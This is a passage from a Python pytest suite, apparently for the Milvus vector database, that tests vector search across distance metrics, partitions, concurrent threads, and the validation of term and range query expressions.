tag = "tag"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query, partition_tags=["(.*)tag"])
assert not check_id_result(res[0], ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=["new(.*)"])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
#
# test for ip metric
#
@pytest.mark.level(2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
if top_k <= top_k_limit:
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.level(2)
def test_search_ip_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_tags=[tag])
assert len(res) == nq
@pytest.mark.level(2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, query, partition_tags=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.level(2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use a disconnected instance, call the search method, and check whether search succeeds
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
def test_search_collection_name_not_existed(self, connect):
'''
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(collection_id)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
def test_search_distance_l2(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the returned distance value with the value computed with the Euclidean (L2) metric
expected: the returned distance equals the computed value
'''
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
res = connect.search(collection, query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the returned distance value with the value computed with the Euclidean (L2) metric
expected: the returned distance equals the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.level(2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the returned distance value with the value computed with the inner product
expected: the returned distance equals the computed value
'''
nq = 2
metric_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, metric_type=metric_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the returned distance value with the value computed with the inner product
expected: the returned distance equals the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metric_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metric_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, metric_type=metric_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the returned distance value with the value computed with the Jaccard metric
expected: the returned distance equals the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="JACCARD")
res = connect.search(binary_collection, query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_jaccard_flat_index_L2(self, connect, binary_collection):
'''
target: search binary_collection with a mismatched metric
method: search the binary collection with the L2 metric
expected: exception raised
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
res = connect.search(binary_collection, query)
@pytest.mark.level(2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the returned distance value with the value computed with the Hamming metric
expected: the returned distance equals the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="HAMMING")
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with the SUBSTRUCTURE metric using query vectors not contained in the collection
expected: empty result returned
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="SUBSTRUCTURE")
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with the SUBSTRUCTURE metric using sub-vectors generated from the inserted vectors
expected: each query hits the entity it was generated from, with distance close to 0
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE", replace_vecs=query_vecs)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with the SUPERSTRUCTURE metric using query vectors not contained in the collection
expected: empty result returned
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="SUPERSTRUCTURE")
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with the SUPERSTRUCTURE metric using super-vectors generated from the inserted vectors
expected: both inserted entities are returned for each query, with distance close to 0
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE", replace_vecs=query_vecs)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.level(2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the returned distance value with the value computed with the Tanimoto metric
expected: the returned distance equals the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="TANIMOTO")
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiple threads
method: search with 4 threads, each thread using its own connection
expected: status ok and the returned results contain the inserted ids
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(collection_id)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = threading.Thread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiple threads sharing a single connection
method: search with 4 threads, all threads sharing the same connection
expected: status ok and the returned results contain the inserted ids
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(collection_id)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
def search(milvus):
res = connect.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = threading.Thread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
def test_search_multi_collections(self, connect, args):
'''
target: test searching multiple collections with the L2 metric
method: add vectors into 10 collections, and search each of them
expected: search status ok, the length of the result is nq and the top hits match the inserted ids
'''
num = 10
top_k = 10
nq = 20
for i in range(num):
collection = gen_unique_str(collection_id + str(i))
connect.create_collection(collection, default_fields)
entities, ids = init_data(connect, collection)
assert len(ids) == nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == top_k
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_value_not_in(self, connect, collection):
'''
method: build query with vector and term expr, where no term value matches any entity
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
# TODO:
@pytest.mark.level(2)
def test_query_term_value_all_in(self, connect, collection):
'''
method: build query with vector and term expr, where all term values match inserted entities
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
# TODO:
@pytest.mark.level(2)
def test_query_term_values_not_in(self, connect, collection):
'''
method: build query with vector and term expr, where no term value matches any entity
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
def test_query_term_values_all_in(self, connect, collection):
'''
method: build query with vector and term expr, where all term values match inserted entities
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO:
def test_query_term_values_parts_in(self, connect, collection):
'''
method: build query with vector and term expr, where only part of the term values match inserted entities
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(nb // 2, nb + nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO:
# TODO:
@pytest.mark.level(2)
def test_query_term_values_repeat(self, connect, collection):
'''
method: build query with vector and term expr, where the term values are repeated
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1 for i in range(1, nb)])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: empty result returned
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
# TODO
@pytest.mark.level(2)
def test_query_term_key_error(self, connect, collection):
'''
method: build query with term key error
expected: Exception raised
'''
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(keyword="terrm", values=[i for i in range(nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_term()
)
def get_invalid_term(self, request):
return request.param
@pytest.mark.level(2)
def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
'''
method: build query with wrong format term
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
term = get_invalid_term
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
# TODO
@pytest.mark.level(2)
def test_query_term_field_named_term(self, connect, collection):
'''
method: build query with field named "term"
expected: error raised
'''
term_fields = add_field_default(default_fields, field_name="term")
collection_term = gen_unique_str("term")
connect.create_collection(collection_term, term_fields)
term_entities = add_field(entities, field_name="term")
ids = connect.insert(collection_term, term_entities)
assert len(ids) == nb
connect.flush([collection_term])
count = connect.count_entities(collection_term)
assert count == nb
term_param = {"term": {"term": {"values": [i for i in range(nb // 2)]}}}
expr = {"must": [gen_default_vector_expr(default_query),
term_param]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection_term, query)
assert len(res) == nq
assert len(res[0]) == top_k
connect.drop_collection(collection_term)
@pytest.mark.level(2)
def test_query_term_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields term, one of it not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
term["term"].update({"a": [0]})
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
# TODO
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_range()
)
def get_invalid_range(self, request):
return request.param
# TODO
@pytest.mark.level(2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with string values in the range expr
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with an empty range (GT value greater than LT value)
expected: empty result returned
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res[0]) == 0
@pytest.fixture(
scope="function",
params=gen_valid_ranges()
)
def get_valid_ranges(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
# TODO
@pytest.mark.level(2)
def test_query_multi_term_has_common(self, connect, collection):
'''
method: build query with multiple term exprs on the same field, whose values have common elements
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(nb // 3)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO
@pytest.mark.level(2)
def test_query_multi_term_no_common(self, connect, collection):
'''
method: build query with multiple term exprs on the same field, with no common values
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(nb // 2, nb + nb // 2)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
def test_query_multi_term_different_fields(self, connect, collection):
'''
method: build query with term exprs on two different fields whose value sets do not overlap
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(field="float", values=[float(i) for i in range(nb // 2, nb)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
@pytest.mark.level(2)
def test_query_single_term_multi_fields(self, connect, collection):
'''
method: build a single term expr containing multiple fields
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term_first = {"int64": {"values": [i for i in range(nb // 2)]}}
term_second = {"float": {"values": [float(i) for i in range(nb // 2, nb)]}}
term = update_term_expr({"term": {}}, [term_first, term_second])
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
# TODO
@pytest.mark.level(2)
def test_query_multi_range_has_common(self, connect, collection):
'''
method: build query with multiple range exprs on the same field, with overlapping ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": 1, "LT": nb // 3})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO
@pytest.mark.level(2)
def test_query_multi_range_no_common(self, connect, collection):
'''
method: build query with multiple range exprs on the same field, with non-overlapping ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": nb // 2, "LT": nb})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
@pytest.mark.level(2)
def test_query_multi_range_different_fields(self, connect, collection):
'''
method: build query with range exprs on two different fields whose conditions cannot both be satisfied
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = gen_default_range_expr()
range_second = gen_default_range_expr(field="float", ranges={"GT": nb // 2, "LT": nb})
expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
@pytest.mark.level(2)
def test_query_single_range_multi_fields(self, connect, collection):
'''
method: build a single range expr containing multiple fields
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range_first = {"int64": {"GT": 0, "LT": nb // 2}}
range_second = {"float": {"GT": nb / 2, "LT": float(nb)}}
range = update_range_expr({"range": {}}, [range_first, range_second])
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
# TODO
@pytest.mark.level(2)
def test_query_single_term_range_has_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": -1, "LT": nb // 2})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO
def test_query_single_term_range_no_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": nb // 2, "LT": nb})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
# TODO
def test_query_multi_vectors_same_field(self, connect, collection):
'''
method: build query with two vectors same field
expected: error raised
'''
entities, ids = init_data(connect, collection)
